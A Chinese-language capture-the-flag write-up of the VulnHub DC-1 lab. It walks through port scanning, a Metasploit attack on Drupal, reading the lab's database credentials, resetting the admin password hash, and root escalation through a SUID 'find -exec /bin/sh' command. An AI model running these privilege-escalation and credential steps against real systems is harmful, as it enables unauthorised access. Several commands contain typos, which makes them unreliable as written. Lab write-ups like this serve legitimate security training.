vulnhub--DC1

一.信息收集
扫存活主机

arp-scan -l

扫描靶场开放端口

nnap -sS -v 192.168.111.130

查看80端口

二.漏洞利用
msf攻击

拿到meterpreter以后查看当前目录，发现flag1.txt,cat得到flag1

根据flag1的提示百度，得到Drupal的数据库配置文件在sites/default/settings.php

cat setting.php得到flag2.txt

三.提权
接下来可以从mysql入手，先溢出提权，得到一个交互式shell

python -c ‘import pty;pty.spawn(“/bin/sh”)’

再根据已知用户密码连接mysql

mysql -udbuser -pR0ck3t

接下来show库show表

在show表的时候发现users表

发现用户密码被hash加密了，百度查找后了解到Drupal的加密脚本在根目录的scripts中，可以生成一个密码来重置管理员密码。
加密脚本

./scripts/password-hash.sh 333333

更新管理员密码

接下来就可以用密码登录网站了，在content中找到flag3

发现关键词passwd，进入ect目录查看，果然有passwd

打开发现flag4在home目录中，进入/home/flag4目录中找到flag4.txt文件

刚开始看了flag4提示没有头绪，后来看了其他大佬的wp才知道能用suid提权

suid的作用：用于执行文件，以文件的拥有者的身份运行该文件。 chmod u+s 文件名

以下命令可以发现系统上运行的所有SUID可执行文件。

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm-4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

发现find命令有root权限

用find提权,成功获得root权限

find / name flag4 -exec “/bin/sh” ;

打开root目录发现最后一个flag